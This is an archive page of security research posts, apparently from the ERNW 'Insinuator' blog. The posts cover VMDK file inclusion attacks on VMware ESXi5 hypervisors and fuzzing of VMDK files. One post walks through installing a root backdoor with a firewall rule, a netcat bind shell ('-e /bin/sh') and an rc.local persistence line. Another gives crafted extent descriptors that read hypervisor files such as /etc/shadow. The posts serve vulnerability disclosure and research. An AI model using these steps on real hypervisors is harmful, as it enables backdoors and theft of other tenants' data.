Insinuator


Some outright rants from a bunch of infosec practitioners.

TAG | vmware

In our last series of posts regarding the VMDK file inclusion attack, we focused on read access and prerequisites for the attack, but avoided stating too much about potential write access. But as we promised to cover write access in the course of our future research, the following post will describe our latest research results.

First of all, the same prerequisites (which will be refined a little bit more later on) as for read access must be fulfilled and the same steps have to be performed in order to carry out the attack successfully. If that is the case, there are several POIs (Partitions Of Interest) on a ESXi hypervisor that are interesting to include:

  • /bootbank → contains several archives which build the hypervisors filesystem once they are unpacked
  • /altbootbank → backup of the prior version of bootbank, e.g. copied before a firmware update
  • /scratch → mainly log files and core dumps stored here
  • /vmfs/volumes/datastoreX → storage for virtual machine files

The root filesystem is stored on a ramdisk which is populated at boot time using the archives stored in the bootbank partition. As this means that there is no actual root partition (since it is generated dynamically at boot time and there is no such thing like a device descriptor for the ramdisk), this excludes the root file system from our attack tree, at least at first sight.

While trying to write to different partitions, we noticed that the writing sometimes fails. Evaluating the reason for the failure, we also noticed that this is only the case for certain partitions, such as /scratch. After monitoring the specific write process, we noticed the following errors:

Virtual Machine:

attx kernel: [93.238762] sd 0:0:0:0: [sda] Unhandled sense code
attx kernel: [93.238767] sd 0:0:0:0: [sda]  Result: hostbyte=invalid
                         driverbyte=DRIVER_SENSE
attx kernel: [93.238771] sd 0:0:0:0: [sda]  Sense Key : Data Protect [current]
attx kernel: [93.238776] sd 0:0:0:0: [sda]  Add. Sense: No additional sense information
attx kernel: [93.238780] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 02 04 bd 20 00 00 08 00
attx kernel: [93.238790] end_request: critical target error, dev sda, sector 33864992
attx kernel: [93.239029] Buffer I/O error on device sda, logical block 4233124
attx kernel: [93.239181] lost page write due to I/O error on sda

Hypervisor:

cpu0:2157)WARNING: NMP: nmpDeviceTaskMgmt:2210:Attempt to issue lun reset on device
                        naa.600508b1001ca97740cc02561658c136. This will clear any
                        SCSI-2 reservations on the device.
cpu0:2157)<4>hpsa 0000:05:00.0: resetting device 6:0:0:1
cpu0:2157)<4>hpsa 0000:05:00.0: device is ready

Assuming that the hypervisor hard drive is not broken for exactly the cases we try to write from within a guest machine, we performed further tests (using various bash scripts and endless writing loops) and found out that this error occurs when the hypervisor and a guest machine are trying to write at the same time to the same device. Due to the fact that the hypervisor continuously writes log files to the /scratch file system and generates all kind of I/O to the /vmfs data stores (due to the running virtual machines stored on that partition), it was not possible to write to those devices in a reliable way.

Fortunately (at least from an attacker’s point of view ;) ) the remaining partitions, /bootbank and /altbootbank, are only accessed at boot time and it is hence possible to write to those partitions in a reliable way. At that point, the initially mentioned fact about the lacking root partition gets important again: As the root partition would be the first and most promising target of write access, it would most probably also be locked by the hypervisor as there might also be different files that would be written on periodically. So when we were searching for a way to write to the dynamically generated root partition, we came up with the following steps:

  • Include the device holding the /bootbank partition.
  • Write to the /bootbank partition.
  • Wait for the hypervisor to reboot (or perform the potential DoS attack we identified, which will be described in a future post).
  • Enjoy the files from the /bootbank partition being populated to the dynamically created root partition.

The last step is of particular relevance. /bootbank holds several files that contain archives of system-critical files and directories of the ESXi hypervisor. For example the /bootbank/s.v00 contains an archive of the directories and files, including parts of /etc.  The hypervisor restores the particular directories (such as /etc) at startup from the files stored in /bootbank. As we are able to write files to /bootbank, it is possible to replace contents of /bootbank/s.v00 and thus contents of /etc of the hypervisor ramdisk. In order to make sure that certain files in /etc are replaced, we can access the file /bootbank/boot.cfg which holds a list of archives which get extracted at boot time. As we have all necessary information to write to the root partition of the hypervisor, these are the steps to be performed:

  • Obtain /bootbank archive, in this example /bootbank/s.v00, using the well-known attack vector.
  • Convert/extract archive: The archives in /bootbank are packed with a special version of tar which is incompatible with the GNU tar. However this vmtar version can be ported to a GNU/Linux by copying the vmtar binary and libvmlibs.so from any ESXi installation.
  • Modify or add files.
  • Repack the archive.
  • Deploy the modified archive to /bootbank using the write access.

Following this generic process, we were able to install a backdoor on our ESXi5 hypervisor. In a first step, we opened a port in the ESXi firewall (which has a drop-all policy) as we wanted to deploy a bind shell (even though we could have used a connect-back shell instead, but we also want to demonstrate that is possible to modify system-critical settings). The firewall is configured by xml files stored in /etc/vmware/firewall. These xml files are built as follows:

<ConfigRoot>
  <service id='0000'>
    <id>sshServer</id>
    <rule id='0000'>
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>22</port>
    </rule>
    <enabled>false</enabled>
    <required>false</required>
  </service>
[...]
</ConfigRoot>

The xml format is kind of self-explanatory. Every service has a unique identifier id, and can have inbound and outbound rules. To enable the rule on system boot the enabled field has to be set to true.

Based on this schema it is easy to deploy a new firewall rule. Simply place a new xml file to /etc/vmware/firewall in the archive which will be written to the bootbank later on.

For example to open port 42000:

<ConfigRoot>
  <service id="0000">
    <id>remote Bind Shell</id>
    <rule id="0000">
      <direction>inbound</direction>
      <protocol>tcp</protocol>
      <porttype>dst</porttype>
      <port>4444</port>
    </rule>
    <enabled>true</enabled>
    <required>false</required>
  </service>
</ConfigRoot>

This ruleset will be applied the next time the hypervisor reboots, after overwriting one of the archives in bootbank with our altered one.

The next step is to bind a shell to the opened port. Unfortunately the netcat installed per default on the hypervisor is not capable of the “-e” option, which executes a command after an established connection. The most basic netcat bind shell just listens on a port and forwards all input to the binary specified by the -e switch:

netcat -l -p 4444 -e /bin/sh.

Luckily the netcat version of 32bit BackTrack distribution is compatible with the ESXi platform and supports the -e switch. After copying this binary to the hypervisor, we just need to make sure that the backdoor is started during the boot process by adding the following line to /etc/rc.local:

/etc/netcat –l –p 4444 –e /bin/sh &

Next time the hypervisor starts, a remote shell will listen on port 4444 with root privileges. The following steps summarize the process of fully compromising the ESXi hypervisor:

  • Include the /bootbank partition using our well-known attack path
  • Unpack /bootbank/s.v00
  • Add our bind shell port to the firewall by adding the described file to /path/to/extracted/etc/vmware/firewall
  • Add the netcat binary to /path/to/extracted/etc/nc
  • Add the above line to  /path/to/extracted/etc/rc.local
  • Wait for the next reboot of the hypervisor (or our post on the potential DoS ;) )

At the end of the day, this means that once attacker is able to upload VMDK files to an ESXi environment (in a way that fulfills the stated requirements), it is possible to alter the configuration of the underlying hypervisor and even to install a backdoor which grants command line access.

 

Enjoy!

Pascal & Matthias

, , | Post your comment here.

May/12

30

Fuzzing VMDK files

As announced at last week’s #HITB2012AMS, I’ll describe the fuzzing steps which were performed during our initial research. The very first step was the definition of the interfaces we wanted to test. We decided to go with the plain text VMDK file, as this is the main virtual disk description file and in most deployment scenarios user controlled, and the data part of a special kind of VMDK files, the Host Sparse Extends.

The used fuzzing toolkit is dizzy which just got an update last week (which brings you guys closer to trunk state ;) ).

The main VMDK file goes straight forward, fuzzing wise. Here is a short sample file:

# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=fffffffe
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 40960 VMFS "ts_2vmdk-flat.vmdk"
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "8"
ddb.longContentID = "c818e173248456a9f5d83051fffffffe"
ddb.uuid = "60 00 C2 94 23 7b c1 41-51 76 b2 79 23 b5 3c 93"
ddb.geometry.cylinders = "20"
ddb.geometry.heads = "64"
ddb.geometry.sectors = "32"
ddb.adapterType = "buslogic"

 

As one can easily see the file is plain text and is based upon a name=value syntax. So a fuzzing script for this file would look something link this:

name = "vmdkfile"
objects = [
    field("descr_comment", None, "# Disk DescriptorFile\n", none),

    field("version_str", None, "version=", none),
    field("version", None, "1", std),
    field("version_br", None, "\n", none),

    field("encoding_str", None, "encoding=", none),
    field("encoding", None, '"UTF-8"', std),
    field("encoding_br", None, "\n", none),
    [...]
    ]
functions = []

 

The first field, descr_comment, and the second field, version_str,  are plain static, as defined by the last parameter, so they wont get mutated. The first actual fuzzed string is the version field, which got a default value of the string 1 and will be mutated with all strings in your fuzz library.

As the attentive reader might have noticed, this is just the first attempt, as there is one but special inconsistency in the example file above: The quoting. Some values are Quoted, some are not. A good fuzzing script would try to play with exactly this inconsistency. Is it possible to set version to a string? Could one set the encoding to an integer value?

The second file we tried to fuzz was the Host Sparse Extend, a data file which is not plain data as the Flat Extends, but got a binary file header. This header is parsed by the ESX host and, as included in the data file, might be user defined. The definition from VMware is the following:

typedef struct COWDisk_Header {
    uint32 magicNumber;
    uint32 version;
    uint32 flags;
    uint32 numSectors;
    uint32 grainSize;
    uint32 gdOffset;
    uint32 numGDEntries;
    uint32 freeSector;
    union {
        struct {
            uint32 cylinders;
            uint32 heads;
            uint32 sectors;
        } root;
        struct {
            char parentFileName[COWDISK_MAX_PARENT_FILELEN];
            uint32 parentGeneration;
        } child;
    } u;
    uint32 generation;
    char name[COWDISK_MAX_NAME_LEN];
    char description[COWDISK_MAX_DESC_LEN];
    uint32 savedGeneration;
    char reserved[8];
    uint32 uncleanShutdown;
    char padding[396];
} COWDisk_Header;

 

Interesting header fields are all C strings (think about NULL termination) and of course the gdOffset in combination with numSectors and grainSize, as manipulating this values could lead the ESX host to access data outside of the user deployed data file.

So far so good, after writing the fuzzing scripts one needs to create a lot of VMDK files. This was done using dizzy:

./dizzy.py -o file -d /tmp/vmdkfuzzing.vmdk -w 0 vmdkfile.dizz

 

Last but not least we needed to automate the deployment of the generated VMDK files. This was done with a simple shell script on the ESX host, using vim-cmd, a command line tool to administrate virtual machines.

By now the main fuzzing is still running in our lab, so no big results on that front, yet. Feel free to use the provided fuzzing scripts in your own lab. Find the two fuzzing scripts here and here. We will share more results, when the fuzzing is finished.

Have a nice day and start fuzzing ;)

Daniel and Pascal

, , , , | Post your comment here.

A quick update on the workshop we’ve just finished at Hack in the Box 2012 Amsterdam:
Due to popular demand we decided to bring the slides online without wasting any more time. The official website of the conference is currently experiencing some problems due to high interest in all the stuff what was released in the last two days. Great conference!

Here you go: HITB2012AMS ERNW VMDK Has Left the Building [PDF, 6MB, link fixed]

Enjoy and feel free to express your thoughts in the comments.

Best greetings from Amsterdam,
Florian & the crew

, , , , | Post your comment here.

Update #1: Slides are available for download here.

In the course of our ongoing cloud security research, we’re continuously thinking about potential attack vectors against public cloud infrastructures. Approaching this enumeration from an external customer’s (speak: attacker’s ;) ) perspective, there are the following possibilities to communicate with and thus send malicious input to typical cloud infrastructures:

  • Management interfaces
  • Guest/hypervisor interaction
  • Network communication
  • File uploads

As there are already several successful exploits against management interfaces (e.g. here and here) and guest/hypervisor interaction (see for example this one; yes, this is the funny one with that ridiculous recommendation “Do not allow untrusted users access to your virtual machines.” ;-)), we’re focusing on the upload of files to cloud infrastructures in this post. According to our experience with major Infrastructure-as-a-Service (IaaS) cloud providers, the most relevant file upload possibility is the deployment of already existing virtual machines to the provided cloud infrastructure. However, since a quick additional research shows that most of those allow the upload of VMware-based virtual machines and, to the best of our knowledge, the VMware virtualization file format was not analyzed as for potential vulnerabilities yet, we want to provide an analysis of the relevant file types and present resulting attack vectors.

As there are a lot of VMware related file types, a typical virtual machine upload functionality comprises at least two file types:

  • VMX
  • VMDK

The VMX file is the configuration file for the characteristics of the virtual machine, such as included devices, names, or network interfaces. VMDK files specify the hard disk of a virtual machine and mainly contain two types of files: The descriptor file, which describes the specific setup of the actual disk file, and several disk files containing the actual file system for the virtual machine. The following listing shows a sample VMDK descriptor file:


# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=a5c61889
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "machine-flat01.vmdk"
RW 33554432 VMFS "machine-flat02.vmdk"
[...]

For this post, it is of particular importance that the inclusion of the actual disk file containing the raw device data allows the inclusion of multiple files or devices (in the listing, the so-called “Extent description”). The deployment of these files into a (public) cloud/virtualized environment can be broken down into several steps:

  1. Upload to the cloud environment: e.g. by using FTP, web interfaces, $WEB_SERVICE_API (such as the Amazon SOAP API, which admittedly does not allow the upload of virtual machines at the moment).
  2. Move to the data store: The uploaded virtual machine must be moved to the data store, which is typically some kind of back end storage system/SAN where shares can be attached to hypervisors and guests.
  3. Deployment on the hypervisor (“starting the virtual machine”): This can include an additional step of “cloning” the virtual machine from the back end storage system to local hypervisor hard drives.

To analyze this process more thoroughly, we built a small lab based on VMware vSphere 5 including

  • an ESXi5 hypervisor,
  • NFS-based storage, and
  • vCenter,

everything fully patched as of 2012/05/24. The deployment process we used was based on common practices we know from different customer projects: The virtual machine was copied to the storage, which is accessible from the hypervisor, and was deployed on the ESXi5 using the vmware-cmd utility utilizing the VMware API. Thinking about actual attacks in this environment, two main approaches come to mind:

  • Fuzzing attacks: Given ERNW’s long tradition in the area of fuzzing, this seems to be a viable option. Still this is not in scope of this post, but we’ll lay out some things tomorrow in our workshop at #HITB2012AMS.
  • File Inclusion Attacks.

Focusing on the latter, the descriptor file (see above) contains several fields which are worth a closer look. Even though the specification of the VMDK descriptor file will not be discussed here in detail, the most important field for this post is the so-called Extent Description. The extent descriptions basically contain paths to the actual raw disk files containing the file system of the virtual machine and were included in the listing above.

The most obvious idea is to change the path to the actual disk file to another path, somewhere in the ESX file system, like the good ol’ /etc/passwd:


# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=a5c61889
parentCID=ffffffff
isNativeSnapshot="no"
createType="vmfs"
# Extent description
RW 33554432 VMFS "machine-flat01.vmdk"
RW 0 VMFSRAW "/etc/passwd"

Unfortunately, this does not seem to work and results in an error message as the next screenshot shows:

As we are highly convinced that a healthy dose of perseverance (not to say stubbornness ;-) ) is part of any hackers/pentesters attributes, we gave it several other tries. As the file to be included was a raw disk file, we focused on files in binary formats. After some enumeration, we were actually able to include gzip-compressed log files. Since we are now able to access files included in the VMDK files inside the guest virtual machine, this must be clearly stated: We have/can get access to the log files of the ESX hypervisor by deploying a guest virtual machine – a very nice first step! Including further compressed log files, we also included the /bootbank/state.tgz file. This file contains a complete backup of the /etc directory of the hypervisor, including e.g. /etc/shadow – once again, this inclusion was possible from a GUEST machine! As the following screenshot visualizes, the necessary steps to include files from the ESXi5 host include the creation of a loopback device which points to the actual file location (since it is part of the overall VMDK file) and extracting the contents of this loopback device:

The screenshot also shows how it is possible to access information which is clearly belonging to the ESXi5 host from within the guest system. Even though this allows a whole bunch of possible attacks, coming back to the original inclusion of raw disk files, the physical hard drives of the hypervisor qualify as a very interesting target. A look at the device files of the hypervisor (see next screenshot) reveals that the device names are generated in a not-easily-guessable-way:

Using this knowledge we gathered from the hypervisor (this is heavily noted at this point, we’re relying on knowledge that we gathered from our administrative hypervisor access), it was also possible to include the physical hard drives of the hypervisor. Even though we needed additional knowledge for this inclusion, the sheer fact that it is possible for a GUEST virtual machine to access the physical hard drives of the hypervisor is a pretty big deal! As you still might have our stubbornness in mind, it is obvious that we needed to make this inclusion work without knowledge about the hypervisor. Thus let’s provide you with a way to access to any data in a vSphere based cloud environment without further knowledge:

  1. Ensure that the following requirements are met:
    • ESXi5 hypervisor in use (we’re still researching how to port these vulnerabilities to ESX4)
    • Deployment of externally provided (in our case, speak: malicious ;-) ) VMDK files is possible
    • The cloud provider performs the deployment using the VMware API (e.g. in combination with external storage, which is, as laid out above, a common practice) without further sanitization/input validation/VMDK rewriting.
  2. Deploy a virtual machine referencing /scratch/log/hostd.0.gz
  3. Access the included /scratch/log/hostd.0.gz within the guest system and grep for ESXi5 device names ;-)
  4. Deploy another virtual machine referencing the extracted device names
  5. Enjoy access to all physical hard drives of the hypervisor ;-)

It must be noted that the hypervisor hard drives contain the so-called VMFS, which cannot be easily mounted within e.g. a Linux guest machines, but it can be parsed for data, accessed using VMware specific tools, or exported to be mounted on another hypervisor under our own administrative control.

Summarizing the most relevant and devastating message in short:

VMware vSphere 5 based IaaS cloud environments potentially contain possibilities to access other customers’ data…

We’ll conduct some “testing in the field” in the upcoming weeks and get back to you with the results in a whitepaper to be found on this blog. In any case this type of attacks might provide yet-another path for accessing other tenants’ data in multi-tenant environments, even though more research work is needed here. If you have the opportunity you might join our workshop at #HITB2012AMS.

Have a great day,

Pascal, Enno, Matthias, Daniel

, , | Post your comment here.

Reading this advisory I’m quite tempted to emit another rant on the relationship of heavy use of 3rd party components, lack of (security) quality assurance and services running at times where they’re not needed (see second workaround here). I’ll refrain  from that for today. Just wanted to let you know that the underlying vulnerability in Struts2 was initially discovered by Meder Kydyraliev who gives this talk at Troopers in two weeks. He’ll certainly describe the inner workings of this one, and others… ;-)

Have a good one,

Enno

| Post your comment here.

Just wanted to let you know that we sent out ERNW Newsletter 32 end of last week. As we promised it includes the results of  research regarding the question “Is browser virtualization a valid security control in order to mitigate browser based security risks?”.

Simon did a great job with writing the latest newsletter. It’s a 30-page document which should help you to have a basis for well-informed decisions when it comes to the deployment of an application virtualization technology.

Download a signed version of the PDF here, or visit the archive to browse other issues of our highly technical newsletters.

Best wishes,
Florian

, , , , | Post your comment here.

Contact


Mail | Twitter | Imprint

©2010-2013 ERNW GmbH
To top